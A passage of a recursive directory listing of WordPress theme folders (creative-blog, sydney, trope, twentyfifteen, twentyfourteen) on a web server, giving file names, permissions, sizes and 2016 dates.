-rw-r--r--  1 root root 1.9K Jun  1  2016 sidebar-left.php
-rw-r--r--  1 root root 1.9K Jun  1  2016 sidebar.php
-rw-r--r--  1 root root 2.0K Jun  1  2016 single.php
-rw-r--r--  1 root root  26K Jun  1  2016 style.css
drwxr-xr-x  2 root root 4.0K Jun  1  2016 template-parts

/var/www/https/blogblog/wp-content/themes/creative-blog/bootstrap:
total 20K
drwxr-xr-x  5 root root 4.0K Jun  1  2016 .
drwxr-xr-x 11 root root 4.0K Jun  1  2016 ..
drwxr-xr-x  2 root root 4.0K Jun  1  2016 css
drwxr-xr-x  2 root root 4.0K Jun  1  2016 fonts
drwxr-xr-x  2 root root 4.0K Jun  1  2016 js

/var/www/https/blogblog/wp-content/themes/creative-blog/bootstrap/css:
total 324K
drwxr-xr-x 2 root root 4.0K Jun  1  2016 .
drwxr-xr-x 5 root root 4.0K Jun  1  2016 ..
-rw-r--r-- 1 root root 143K Jun  1  2016 bootstrap.css
-rw-r--r-- 1 root root 119K Jun  1  2016 bootstrap.min.css
-rw-r--r-- 1 root root  26K Jun  1  2016 bootstrap-theme.css
-rw-r--r-- 1 root root  23K Jun  1  2016 bootstrap-theme.min.css

/var/www/https/blogblog/wp-content/themes/creative-blog/bootstrap/fonts:
total 228K
drwxr-xr-x 2 root root 4.0K Jun  1  2016 .
drwxr-xr-x 5 root root 4.0K Jun  1  2016 ..
-rw-r--r-- 1 root root  20K Jun  1  2016 glyphicons-halflings-regular.eot
-rw-r--r-- 1 root root 107K Jun  1  2016 glyphicons-halflings-regular.svg
-rw-r--r-- 1 root root  45K Jun  1  2016 glyphicons-halflings-regular.ttf
-rw-r--r-- 1 root root  23K Jun  1  2016 glyphicons-halflings-regular.woff
-rw-r--r-- 1 root root  18K Jun  1  2016 glyphicons-halflings-regular.woff2

/var/www/https/blogblog/wp-content/themes/creative-blog/bootstrap/js:
total 116K
drwxr-xr-x 2 root root 4.0K Jun  1  2016 .
drwxr-xr-x 5 root root 4.0K Jun  1  2016 ..
-rw-r--r-- 1 root root  68K Jun  1  2016 bootstrap.js
-rw-r--r-- 1 root root  37K Jun  1  2016 bootstrap.min.js

/var/www/https/blogblog/wp-content/themes/creative-blog/css:
total 16K
drwxr-xr-x  2 root root 4.0K Jun  1  2016 .
drwxr-xr-x 11 root root 4.0K Jun  1  2016 ..
-rw-r--r--  1 root root 1.2K Jun  1  2016 custom-layout.css
-rw-r--r--  1 root root  904 Jun  1  2016 custom-layout.min.css

/var/www/https/blogblog/wp-content/themes/creative-blog/fontawesome:
total 16K
drwxr-xr-x  4 root root 4.0K Jun  1  2016 .
drwxr-xr-x 11 root root 4.0K Jun  1  2016 ..
drwxr-xr-x  2 root root 4.0K Jun  1  2016 css
drwxr-xr-x  2 root root 4.0K Jun  1  2016 fonts

/var/www/https/blogblog/wp-content/themes/creative-blog/fontawesome/css:
total 76K
drwxr-xr-x 2 root root 4.0K Jun  1  2016 .
drwxr-xr-x 4 root root 4.0K Jun  1  2016 ..
-rw-r--r-- 1 root root  35K Jun  1  2016 font-awesome.css
-rw-r--r-- 1 root root  29K Jun  1  2016 font-awesome.min.css

/var/www/https/blogblog/wp-content/themes/creative-blog/fontawesome/fonts:
total 908K
drwxr-xr-x 2 root root 4.0K Jun  1  2016 .
drwxr-xr-x 4 root root 4.0K Jun  1  2016 ..
-rw-r--r-- 1 root root 122K Jun  1  2016 FontAwesome.otf
-rw-r--r-- 1 root root  75K Jun  1  2016 fontawesome-webfont.eot
-rw-r--r-- 1 root root 382K Jun  1  2016 fontawesome-webfont.svg
-rw-r--r-- 1 root root 149K Jun  1  2016 fontawesome-webfont.ttf
-rw-r--r-- 1 root root  89K Jun  1  2016 fontawesome-webfont.woff
-rw-r--r-- 1 root root  71K Jun  1  2016 fontawesome-webfont.woff2

/var/www/https/blogblog/wp-content/themes/creative-blog/img:
total 24K
drwxr-xr-x  2 root root 4.0K Jun  1  2016 .
drwxr-xr-x 11 root root 4.0K Jun  1  2016 ..
-rw-r--r--  1 root root 2.9K Jun  1  2016 left-sidebar.png
-rw-r--r--  1 root root 2.9K Jun  1  2016 no-sidebar-content-centered-layout.png
-rw-r--r--  1 root root 2.9K Jun  1  2016 no-sidebar-full-width-layout.png
-rw-r--r--  1 root root 2.9K Jun  1  2016 right-sidebar.png

/var/www/https/blogblog/wp-content/themes/creative-blog/inc:
total 120K
drwxr-xr-x  2 root root 4.0K Jun  1  2016 .
drwxr-xr-x 11 root root 4.0K Jun  1  2016 ..
-rw-r--r--  1 root root 2.1K Jun  1  2016 custom-header.php
-rw-r--r--  1 root root  26K Jun  1  2016 customizer.php
-rw-r--r--  1 root root  31K Jun  1  2016 extras.php
-rw-r--r--  1 root root 1.1K Jun  1  2016 jetpack.php
-rw-r--r--  1 root root 4.3K Jun  1  2016 meta-boxes.php
-rw-r--r--  1 root root 1.7K Jun  1  2016 related-posts.php
-rw-r--r--  1 root root 4.1K Jun  1  2016 template-tags.php
-rw-r--r--  1 root root  12K Jun  1  2016 widgets.php
-rw-r--r--  1 root root 8.2K Jun  1  2016 wp_bootstrap_navwalker.php

/var/www/https/blogblog/wp-content/themes/creative-blog/js:
total 60K
drwxr-xr-x  7 root root 4.0K Jun  1  2016 .
drwxr-xr-x 11 root root 4.0K Jun  1  2016 ..
-rw-r--r--  1 root root 2.1K Jun  1  2016 creative-blog-custom.js
-rw-r--r--  1 root root 1.1K Jun  1  2016 creative-blog-custom.min.js
-rw-r--r--  1 root root 1.2K Jun  1  2016 customizer.js
-rw-r--r--  1 root root  423 Jun  1  2016 customizer.min.js
-rw-r--r--  1 root root  426 Jun  1  2016 custom-layout.js
-rw-r--r--  1 root root  310 Jun  1  2016 custom-layout.min.js
drwxr-xr-x  2 root root 4.0K Jun  1  2016 fitvids
drwxr-xr-x  2 root root 4.0K Jun  1  2016 html5shiv
drwxr-xr-x  2 root root 4.0K Jun  1  2016 magnific-popup
drwxr-xr-x  2 root root 4.0K Jun  1  2016 news-ticker
-rw-r--r--  1 root root 1.1K Jun  1  2016 skip-link-focus-fix.js
-rw-r--r--  1 root root  480 Jun  1  2016 skip-link-focus-fix.min.js
drwxr-xr-x  2 root root 4.0K Jun  1  2016 sticky

/var/www/https/blogblog/wp-content/themes/creative-blog/js/fitvids:
total 16K
drwxr-xr-x 2 root root 4.0K Jun  1  2016 .
drwxr-xr-x 7 root root 4.0K Jun  1  2016 ..
-rw-r--r-- 1 root root 3.3K Jun  1  2016 jquery.fitvids.js
-rw-r--r-- 1 root root 1.7K Jun  1  2016 jquery.fitvids.min.js

/var/www/https/blogblog/wp-content/themes/creative-blog/js/html5shiv:
total 24K
drwxr-xr-x 2 root root 4.0K Jun  1  2016 .
drwxr-xr-x 7 root root 4.0K Jun  1  2016 ..
-rw-r--r-- 1 root root  11K Jun  1  2016 html5shiv.js
-rw-r--r-- 1 root root 2.7K Jun  1  2016 html5shiv.min.js

/var/www/https/blogblog/wp-content/themes/creative-blog/js/magnific-popup:
total 88K
drwxr-xr-x 2 root root 4.0K Jun  1  2016 .
drwxr-xr-x 7 root root 4.0K Jun  1  2016 ..
-rw-r--r-- 1 root root  41K Jun  1  2016 jquery.magnific-popup.js
-rw-r--r-- 1 root root  20K Jun  1  2016 jquery.magnific-popup.min.js
-rw-r--r-- 1 root root 6.8K Jun  1  2016 magnific-popup.css
-rw-r--r-- 1 root root 5.1K Jun  1  2016 magnific-popup.min.css

/var/www/https/blogblog/wp-content/themes/creative-blog/js/news-ticker:
total 28K
drwxr-xr-x 2 root root 4.0K Jun  1  2016 .
drwxr-xr-x 7 root root 4.0K Jun  1  2016 ..
-rw-r--r-- 1 root root  13K Jun  1  2016 jquery.newsTicker.js
-rw-r--r-- 1 root root 3.6K Jun  1  2016 jquery.newsTicker.min.js

/var/www/https/blogblog/wp-content/themes/creative-blog/js/sticky:
total 24K
drwxr-xr-x 2 root root 4.0K Jun  1  2016 .
drwxr-xr-x 7 root root 4.0K Jun  1  2016 ..
-rw-r--r-- 1 root root 9.4K Jun  1  2016 jquery.sticky.js
-rw-r--r-- 1 root root 3.9K Jun  1  2016 jquery.sticky.min.js

/var/www/https/blogblog/wp-content/themes/creative-blog/languages:
total 24K
drwxr-xr-x  2 root root 4.0K Jun  1  2016 .
drwxr-xr-x 11 root root 4.0K Jun  1  2016 ..
-rw-r--r--  1 root root  15K Jun  1  2016 creative-blog.pot

/var/www/https/blogblog/wp-content/themes/creative-blog/page-template:
total 12K
drwxr-xr-x  2 root root 4.0K Jun  1  2016 .
drwxr-xr-x 11 root root 4.0K Jun  1  2016 ..
-rw-r--r--  1 root root  950 Jun  1  2016 contact.php

/var/www/https/blogblog/wp-content/themes/creative-blog/template-parts:
total 56K
drwxr-xr-x  2 root root 4.0K Jun  1  2016 .
drwxr-xr-x 11 root root 4.0K Jun  1  2016 ..
-rw-r--r--  1 root root 1.7K Jun  1  2016 content-aside.php
-rw-r--r--  1 root root 2.0K Jun  1  2016 content-audio.php
-rw-r--r--  1 root root 2.0K Jun  1  2016 content-chat.php
-rw-r--r--  1 root root 3.5K Jun  1  2016 content-gallery.php
-rw-r--r--  1 root root 2.8K Jun  1  2016 content-image.php
-rw-r--r--  1 root root 2.1K Jun  1  2016 content-link.php
-rw-r--r--  1 root root 1.3K Jun  1  2016 content-none.php
-rw-r--r--  1 root root 1.5K Jun  1  2016 content-page.php
-rw-r--r--  1 root root 3.0K Jun  1  2016 content.php
-rw-r--r--  1 root root 2.0K Jun  1  2016 content-quote.php
-rw-r--r--  1 root root 2.2K Jun  1  2016 content-status.php
-rw-r--r--  1 root root 2.0K Jun  1  2016 content-video.php

/var/www/https/blogblog/wp-content/themes/sydney:
total 824K
drwxr-xr-x 11 root root 4.0K Apr 26  2016 .
drwxr-xr-x  9 root root 4.0K Jun  4  2016 ..
-rw-r--r--  1 root root  761 Apr 26  2016 404.php
-rw-r--r--  1 root root 2.3K Apr 26  2016 archive-employees.php
-rw-r--r--  1 root root 1.3K Apr 26  2016 archive.php
-rw-r--r--  1 root root 1.2K Apr 26  2016 archive-services.php
-rw-r--r--  1 root root 3.5K Apr 26  2016 changelog.txt
-rw-r--r--  1 root root 2.6K Apr 26  2016 comments.php
-rw-r--r--  1 root root 1.1K Apr 26  2016 content-none.php
-rw-r--r--  1 root root  702 Apr 26  2016 content-page.php
-rw-r--r--  1 root root 1.3K Apr 26  2016 content.php
-rw-r--r--  1 root root 1.2K Apr 26  2016 content-search.php
-rw-r--r--  1 root root  941 Apr 26  2016 content-single.php
drwxr-xr-x  3 root root 4.0K Apr 26  2016 css
drwxr-xr-x  2 root root 4.0K Apr 26  2016 fonts
-rw-r--r--  1 root root  906 Apr 26  2016 footer.php
-rw-r--r--  1 root root 9.9K Apr 26  2016 functions.php
-rw-r--r--  1 root root 2.5K Apr 26  2016 header.php
-rw-r--r--  1 root root  735 Apr 26  2016 home.php
drwxr-xr-x  2 root root 4.0K Apr 26  2016 images
drwxr-xr-x  2 root root 4.0K Apr 26  2016 inc
-rw-r--r--  1 root root 1.2K Apr 26  2016 index.php
drwxr-xr-x  2 root root 4.0K Apr 26  2016 js
drwxr-xr-x  2 root root 4.0K Apr 26  2016 languages
-rw-r--r--  1 root root  15K Apr 26  2016 license.txt
-rw-r--r--  1 root root  851 Apr 26  2016 page.php
drwxr-xr-x  2 root root 4.0K Apr 26  2016 page-templates
drwxr-xr-x  2 root root 4.0K Apr 26  2016 plugins
-rw-r--r--  1 root root 3.0K Apr 26  2016 readme.txt
-rw-r--r--  1 root root 599K Apr 26  2016 screenshot.png
-rw-r--r--  1 root root 1.1K Apr 26  2016 search.php
-rw-r--r--  1 root root 1.3K Apr 26  2016 sidebar-footer.php
-rw-r--r--  1 root root  283 Apr 26  2016 sidebar.php
-rw-r--r--  1 root root  918 Apr 26  2016 single.php
-rw-r--r--  1 root root  68K Apr 26  2016 style.css
drwxr-xr-x  2 root root 4.0K Apr 26  2016 widgets

/var/www/https/blogblog/wp-content/themes/sydney/css:
total 20K
drwxr-xr-x  3 root root 4.0K Apr 26  2016 .
drwxr-xr-x 11 root root 4.0K Apr 26  2016 ..
drwxr-xr-x  2 root root 4.0K Apr 26  2016 bootstrap
-rw-r--r--  1 root root   47 Apr 26  2016 ie9.css
-rw-r--r--  1 root root  675 Apr 26  2016 info-page.css

/var/www/https/blogblog/wp-content/themes/sydney/css/bootstrap:
total 100K
drwxr-xr-x 2 root root 4.0K Apr 26  2016 .
drwxr-xr-x 3 root root 4.0K Apr 26  2016 ..
-rw-r--r-- 1 root root  21K Apr 26  2016 bootstrap.css
-rw-r--r-- 1 root root  17K Apr 26  2016 bootstrap.min.css
-rw-r--r-- 1 root root  22K Apr 26  2016 bootstrap-theme.css
-rw-r--r-- 1 root root  21K Apr 26  2016 bootstrap-theme.min.css

/var/www/https/blogblog/wp-content/themes/sydney/fonts:
total 904K
drwxr-xr-x  2 root root 4.0K Apr 26  2016 .
drwxr-xr-x 11 root root 4.0K Apr 26  2016 ..
-rw-r--r--  1 root root  33K Apr 26  2016 font-awesome.css
-rw-r--r--  1 root root  27K Apr 26  2016 font-awesome.min.css
-rw-r--r--  1 root root 108K Apr 26  2016 FontAwesome.otf
-rw-r--r--  1 root root  70K Apr 26  2016 fontawesome-webfont.eot
-rw-r--r--  1 root root 358K Apr 26  2016 fontawesome-webfont.svg
-rw-r--r--  1 root root 139K Apr 26  2016 fontawesome-webfont.ttf
-rw-r--r--  1 root root  82K Apr 26  2016 fontawesome-webfont.woff
-rw-r--r--  1 root root  66K Apr 26  2016 fontawesome-webfont.woff2

/var/www/https/blogblog/wp-content/themes/sydney/images:
total 772K
drwxr-xr-x  2 root root 4.0K Apr 26  2016 .
drwxr-xr-x 11 root root 4.0K Apr 26  2016 ..
-rw-r--r--  1 root root 258K Apr 26  2016 1.jpg
-rw-r--r--  1 root root 283K Apr 26  2016 2.jpg
-rw-r--r--  1 root root 219K Apr 26  2016 header.jpg

/var/www/https/blogblog/wp-content/themes/sydney/inc:
total 128K
drwxr-xr-x  2 root root 4.0K Apr 26  2016 .
drwxr-xr-x 11 root root 4.0K Apr 26  2016 ..
-rw-r--r--  1 root root 3.3K Apr 26  2016 custom-header.php
-rw-r--r--  1 root root  53K Apr 26  2016 customizer.php
-rw-r--r--  1 root root 1.9K Apr 26  2016 extras.php
-rw-r--r--  1 root root  392 Apr 26  2016 jetpack.php
-rw-r--r--  1 root root 5.2K Apr 26  2016 page-builder.php
-rw-r--r--  1 root root 8.1K Apr 26  2016 slider.php
-rw-r--r--  1 root root  12K Apr 26  2016 styles.php
-rw-r--r--  1 root root 9.3K Apr 26  2016 template-tags.php
-rw-r--r--  1 root root 1.7K Apr 26  2016 theme-info.php
-rw-r--r--  1 root root  843 Apr 26  2016 woocommerce.php

/var/www/https/blogblog/wp-content/themes/sydney/js:
total 292K
drwxr-xr-x  2 root root 4.0K Apr 26  2016 .
drwxr-xr-x 11 root root 4.0K Apr 26  2016 ..
-rw-r--r--  1 root root 3.1K Apr 26  2016 customizer.js
-rw-r--r--  1 root root  27K Apr 26  2016 imagesloaded.pkgd.js
-rw-r--r--  1 root root 3.7K Apr 26  2016 jquery.countTo.js
-rw-r--r--  1 root root 2.7K Apr 26  2016 jquery.fitvids.js
-rw-r--r--  1 root root  53K Apr 26  2016 jquery.flexslider.js
-rw-r--r--  1 root root  15K Apr 26  2016 jquery.superslides.js
-rw-r--r--  1 root root 8.9K Apr 26  2016 main.js
-rw-r--r--  1 root root 5.5K Apr 26  2016 main.min.js
-rw-r--r--  1 root root  314 Apr 26  2016 masonry-init.js
-rw-r--r--  1 root root  52K Apr 26  2016 owl.carousel.js
-rw-r--r--  1 root root  72K Apr 26  2016 scripts.js
-rw-r--r--  1 root root  658 Apr 26  2016 skip-link-focus-fix.js
-rw-r--r--  1 root root  17K Apr 26  2016 waypoints.js

/var/www/https/blogblog/wp-content/themes/sydney/languages:
total 80K
drwxr-xr-x  2 root root 4.0K Apr 26  2016 .
drwxr-xr-x 11 root root 4.0K Apr 26  2016 ..
-rw-r--r--  1 root root  72K Apr 26  2016 sydney.pot

/var/www/https/blogblog/wp-content/themes/sydney/page-templates:
total 16K
drwxr-xr-x  2 root root 4.0K Apr 26  2016 .
drwxr-xr-x 11 root root 4.0K Apr 26  2016 ..
-rw-r--r--  1 root root  391 Apr 26  2016 page_front-page.php
-rw-r--r--  1 root root  533 Apr 26  2016 page_fullwidth.php

/var/www/https/blogblog/wp-content/themes/sydney/plugins:
total 124K
drwxr-xr-x  2 root root 4.0K Apr 26  2016 .
drwxr-xr-x 11 root root 4.0K Apr 26  2016 ..
-rw-r--r--  1 root root 115K Apr 26  2016 class-tgm-plugin-activation.php

/var/www/https/blogblog/wp-content/themes/sydney/widgets:
total 116K
drwxr-xr-x  2 root root 4.0K Apr 26  2016 .
drwxr-xr-x 11 root root 4.0K Apr 26  2016 ..
-rw-r--r--  1 root root 4.2K Apr 26  2016 contact-info.php
-rw-r--r--  1 root root 5.1K Apr 26  2016 fp-call-to-action.php
-rw-r--r--  1 root root 6.6K Apr 26  2016 fp-clients.php
-rw-r--r--  1 root root 8.7K Apr 26  2016 fp-employees.php
-rw-r--r--  1 root root  12K Apr 26  2016 fp-facts.php
-rw-r--r--  1 root root 4.9K Apr 26  2016 fp-latest-news.php
-rw-r--r--  1 root root 4.2K Apr 26  2016 fp-list.php
-rw-r--r--  1 root root 7.3K Apr 26  2016 fp-services-type-a.php
-rw-r--r--  1 root root 7.5K Apr 26  2016 fp-services-type-b.php
-rw-r--r--  1 root root 8.5K Apr 26  2016 fp-skills.php
-rw-r--r--  1 root root 3.1K Apr 26  2016 fp-social.php
-rw-r--r--  1 root root 7.0K Apr 26  2016 fp-testimonials.php
-rw-r--r--  1 root root 2.7K Apr 26  2016 video-widget.php

/var/www/https/blogblog/wp-content/themes/trope:
total 332K
drwxr-xr-x 8 root root 4.0K May 11  2016 .
drwxr-xr-x 9 root root 4.0K Jun  4  2016 ..
-rw-r--r-- 1 root root  815 May 11  2016 404.php
drwxr-xr-x 2 root root 4.0K May 11  2016 admin
-rw-r--r-- 1 root root 1.7K May 11  2016 archive.php
-rw-r--r-- 1 root root 1.1K May 11  2016 author-bio.php
-rw-r--r-- 1 root root 1.8K May 11  2016 author.php
-rw-r--r-- 1 root root 1.2K May 11  2016 category.php
-rw-r--r-- 1 root root  662 May 11  2016 changelog.txt
-rw-r--r-- 1 root root 1.8K May 11  2016 comments.php
-rw-r--r-- 1 root root  931 May 11  2016 content-none.php
-rw-r--r-- 1 root root 2.4K May 11  2016 content.php
drwxr-xr-x 2 root root 4.0K May 11  2016 css
drwxr-xr-x 2 root root 4.0K May 11  2016 fonts
-rw-r--r-- 1 root root 1.2K May 11  2016 footer.php
-rw-r--r-- 1 root root  13K May 11  2016 functions.php
-rw-r--r-- 1 root root 4.2K May 11  2016 header.php
-rw-r--r-- 1 root root 3.1K May 11  2016 image.php
drwxr-xr-x 3 root root 4.0K May 11  2016 images
-rw-r--r-- 1 root root  989 May 11  2016 index.php
drwxr-xr-x 2 root root 4.0K May 11  2016 js
drwxr-xr-x 2 root root 4.0K May 11  2016 languages
-rw-r--r-- 1 root root  426 May 11  2016 page.php
-rw-r--r-- 1 root root 1.2K May 11  2016 readme.txt
-rw-r--r-- 1 root root  14K May 11  2016 rtl.css
-rw-r--r-- 1 root root 148K May 11  2016 screenshot.jpg
-rw-r--r-- 1 root root  319 May 11  2016 searchform.php
-rw-r--r-- 1 root root  840 May 11  2016 search.php
-rw-r--r-- 1 root root  626 May 11  2016 sidebar.php
-rw-r--r-- 1 root root  521 May 11  2016 single.php
-rw-r--r-- 1 root root  32K May 11  2016 style.css
-rw-r--r-- 1 root root 1.2K May 11  2016 tag.php
-rw-r--r-- 1 root root 1.2K May 11  2016 taxonomy-post_format.php

/var/www/https/blogblog/wp-content/themes/trope/admin:
total 16K
drwxr-xr-x 2 root root 4.0K May 11  2016 .
drwxr-xr-x 8 root root 4.0K May 11  2016 ..
-rw-r--r-- 1 root root 7.2K May 11  2016 settings.php

/var/www/https/blogblog/wp-content/themes/trope/css:
total 212K
drwxr-xr-x 2 root root 4.0K May 11  2016 .
drwxr-xr-x 8 root root 4.0K May 11  2016 ..
-rw-r--r-- 1 root root  25K May 11  2016 base.css
-rw-r--r-- 1 root root 115K May 11  2016 bootstrap.css
-rw-r--r-- 1 root root  13K May 11  2016 editor-style.css
-rw-r--r-- 1 root root 4.6K May 11  2016 ie.css
-rw-r--r-- 1 root root  24K May 11  2016 main.css
-rw-r--r-- 1 root root 1.3K May 11  2016 responsive.css
-rw-r--r-- 1 root root 1.9K May 11  2016 single.css
-rw-r--r-- 1 root root 2.8K May 11  2016 slicknav.css

/var/www/https/blogblog/wp-content/themes/trope/fonts:
total 248K
drwxr-xr-x 2 root root 4.0K May 11  2016 .
drwxr-xr-x 8 root root 4.0K May 11  2016 ..
-rw-r--r-- 1 root root 1.4K May 11  2016 COPYING.txt
-rw-r--r-- 1 root root  23K May 11  2016 genericons.css
-rw-r--r-- 1 root root  11K May 11  2016 genericons-regular-webfont.eot
-rw-r--r-- 1 root root  27K May 11  2016 genericons-regular-webfont.svg
-rw-r--r-- 1 root root  20K May 11  2016 genericons-regular-webfont.ttf
-rw-r--r-- 1 root root  12K May 11  2016 genericons-regular-webfont.woff
-rw-r--r-- 1 root root  18K May 11  2016 LICENSE.txt
-rw-r--r-- 1 root root  25K May 11  2016 stmarie-thin-webfont.eot
-rw-r--r-- 1 root root  56K May 11  2016 stmarie-thin-webfont.ttf
-rw-r--r-- 1 root root  29K May 11  2016 stmarie-thin-webfont.woff
-rw-r--r-- 1 root root  424 May 11  2016 stylesheet.css

/var/www/https/blogblog/wp-content/themes/trope/images:
total 36K
drwxr-xr-x 3 root root 4.0K May 11  2016 .
drwxr-xr-x 8 root root 4.0K May 11  2016 ..
-rw-r--r-- 1 root root   86 May 11  2016 dotted-line-2x.png
-rw-r--r-- 1 root root   85 May 11  2016 dotted-line-light-2x.png
-rw-r--r-- 1 root root   80 May 11  2016 dotted-line-light.png
-rw-r--r-- 1 root root   80 May 11  2016 dotted-line.png
drwxr-xr-x 2 root root 4.0K May 11  2016 headers
-rw-r--r-- 1 root root  829 May 11  2016 search-icon-2x.png
-rw-r--r-- 1 root root  422 May 11  2016 search-icon.png

/var/www/https/blogblog/wp-content/themes/trope/images/headers:
total 100K
drwxr-xr-x 2 root root 4.0K May 11  2016 .
drwxr-xr-x 3 root root 4.0K May 11  2016 ..
-rw-r--r-- 1 root root  34K May 11  2016 circle.png
-rw-r--r-- 1 root root 7.9K May 11  2016 circle-thumbnail.png
-rw-r--r-- 1 root root  14K May 11  2016 diamond.png
-rw-r--r-- 1 root root 1.9K May 11  2016 diamond-thumbnail.png
-rw-r--r-- 1 root root  23K May 11  2016 star.png
-rw-r--r-- 1 root root 4.0K May 11  2016 star-thumbnail.png

/var/www/https/blogblog/wp-content/themes/trope/js:
total 40K
drwxr-xr-x 2 root root 4.0K May 11  2016 .
drwxr-xr-x 8 root root 4.0K May 11  2016 ..
-rw-r--r-- 1 root root 2.3K May 11  2016 functions.js
-rw-r--r-- 1 root root 2.4K May 11  2016 html5.js
-rw-r--r-- 1 root root  16K May 11  2016 jquery.slicknav.js
-rw-r--r-- 1 root root  113 May 11  2016 scripts.js
-rw-r--r-- 1 root root 1.2K May 11  2016 theme-customizer.js

/var/www/https/blogblog/wp-content/themes/trope/languages:
total 20K
drwxr-xr-x 2 root root 4.0K May 11  2016 .
drwxr-xr-x 8 root root 4.0K May 11  2016 ..
-rw-r--r-- 1 root root    0 May 11  2016 index.php
-rw-r--r-- 1 root root  254 May 11  2016 readme.txt
-rw-r--r-- 1 root root 7.1K May 11  2016 trope.pot

/var/www/https/blogblog/wp-content/themes/twentyfifteen:
total 596K
drwxr-xr-x 7 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  4  2016 ..
-rw-r--r-- 1 root root  809 Jun  3  2016 404.php
-rw-r--r-- 1 root root 1.9K Jun  3  2016 archive.php
-rw-r--r-- 1 root root 1.2K Jun  3  2016 author-bio.php
-rw-r--r-- 1 root root 1.5K Jun  3  2016 comments.php
-rw-r--r-- 1 root root 1.8K Jun  3  2016 content-link.php
-rw-r--r-- 1 root root 1.2K Jun  3  2016 content-none.php
-rw-r--r-- 1 root root 1.1K Jun  3  2016 content-page.php
-rw-r--r-- 1 root root 1.7K Jun  3  2016 content.php
-rw-r--r-- 1 root root 1.1K Jun  3  2016 content-search.php
drwxr-xr-x 2 root root 4.0K Jun  3  2016 css
-rw-r--r-- 1 root root  823 Jun  3  2016 footer.php
-rw-r--r-- 1 root root  13K Jun  3  2016 functions.php
drwxr-xr-x 2 root root 4.0K Jun  3  2016 genericons
-rw-r--r-- 1 root root 1.8K Jun  3  2016 header.php
-rw-r--r-- 1 root root 2.9K Jun  3  2016 image.php
drwxr-xr-x 2 root root 4.0K Jun  3  2016 inc
-rw-r--r-- 1 root root 1.8K Jun  3  2016 index.php
drwxr-xr-x 2 root root 4.0K Jun  3  2016 js
drwxr-xr-x 2 root root 4.0K Jun  3  2016 languages
-rw-r--r-- 1 root root  902 Jun  3  2016 page.php
-rw-r--r-- 1 root root 3.6K Jun  3  2016 readme.txt
-rw-r--r-- 1 root root  13K Jun  3  2016 rtl.css
-rw-r--r-- 1 root root 368K Jun  3  2016 screenshot.png
-rw-r--r-- 1 root root 1.4K Jun  3  2016 search.php
-rw-r--r-- 1 root root 1.3K Jun  3  2016 sidebar.php
-rw-r--r-- 1 root root 1.5K Jun  3  2016 single.php
-rw-r--r-- 1 root root  95K Jun  3  2016 style.css

/var/www/https/blogblog/wp-content/themes/twentyfifteen/css:
total 36K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 7 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 5.8K Jun  3  2016 editor-style.css
-rw-r--r-- 1 root root 1.2K Jun  3  2016 ie7.css
-rw-r--r-- 1 root root  14K Jun  3  2016 ie.css

/var/www/https/blogblog/wp-content/themes/twentyfifteen/genericons:
total 240K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 7 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 1.4K Jun  3  2016 COPYING.txt
-rw-r--r-- 1 root root  25K Jun  3  2016 example.html
-rw-r--r-- 1 root root  27K Jun  3  2016 genericons.css
-rw-r--r-- 1 root root  23K Jun  3  2016 Genericons.eot
-rw-r--r-- 1 root root  78K Jun  3  2016 Genericons.svg
-rw-r--r-- 1 root root  23K Jun  3  2016 Genericons.ttf
-rw-r--r-- 1 root root  15K Jun  3  2016 Genericons.woff
-rw-r--r-- 1 root root  18K Jun  3  2016 LICENSE.txt
-rw-r--r-- 1 root root 6.5K Jun  3  2016 README.md

/var/www/https/blogblog/wp-content/themes/twentyfifteen/inc:
total 52K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 7 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 2.2K Jun  3  2016 back-compat.php
-rw-r--r-- 1 root root 8.9K Jun  3  2016 custom-header.php
-rw-r--r-- 1 root root  20K Jun  3  2016 customizer.php
-rw-r--r-- 1 root root 7.8K Jun  3  2016 template-tags.php

/var/www/https/blogblog/wp-content/themes/twentyfifteen/js:
total 36K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 7 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 2.9K Jun  3  2016 color-scheme-control.js
-rw-r--r-- 1 root root  832 Jun  3  2016 customize-preview.js
-rw-r--r-- 1 root root 5.1K Jun  3  2016 functions.js
-rw-r--r-- 1 root root 2.4K Jun  3  2016 html5.js
-rw-r--r-- 1 root root  487 Jun  3  2016 keyboard-image-navigation.js
-rw-r--r-- 1 root root  727 Jun  3  2016 skip-link-focus-fix.js

/var/www/https/blogblog/wp-content/themes/twentyfifteen/languages:
total 16K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 7 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 7.0K Jun  3  2016 twentyfifteen.pot

/var/www/https/blogblog/wp-content/themes/twentyfourteen:
total 868K
drwxr-xr-x 9 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  4  2016 ..
-rw-r--r-- 1 root root  719 Jun  3  2016 404.php
-rw-r--r-- 1 root root 2.2K Jun  3  2016 archive.php
-rw-r--r-- 1 root root 1.9K Jun  3  2016 author.php
-rw-r--r-- 1 root root 1.6K Jun  3  2016 category.php
-rw-r--r-- 1 root root 2.3K Jun  3  2016 comments.php
-rw-r--r-- 1 root root 2.3K Jun  3  2016 content-aside.php
-rw-r--r-- 1 root root 2.3K Jun  3  2016 content-audio.php
-rw-r--r-- 1 root root 1.1K Jun  3  2016 content-featured-post.php
-rw-r--r-- 1 root root 2.3K Jun  3  2016 content-gallery.php
-rw-r--r-- 1 root root 2.3K Jun  3  2016 content-image.php
-rw-r--r-- 1 root root 2.3K Jun  3  2016 content-link.php
-rw-r--r-- 1 root root  961 Jun  3  2016 content-none.php
-rw-r--r-- 1 root root  871 Jun  3  2016 content-page.php
-rw-r--r-- 1 root root 2.3K Jun  3  2016 content.php
-rw-r--r-- 1 root root 2.3K Jun  3  2016 content-quote.php
-rw-r--r-- 1 root root 2.3K Jun  3  2016 content-video.php
drwxr-xr-x 2 root root 4.0K Jun  3  2016 css
-rw-r--r-- 1 root root  945 Jun  3  2016 featured-content.php
-rw-r--r-- 1 root root  728 Jun  3  2016 footer.php
-rw-r--r-- 1 root root  17K Jun  3  2016 functions.php
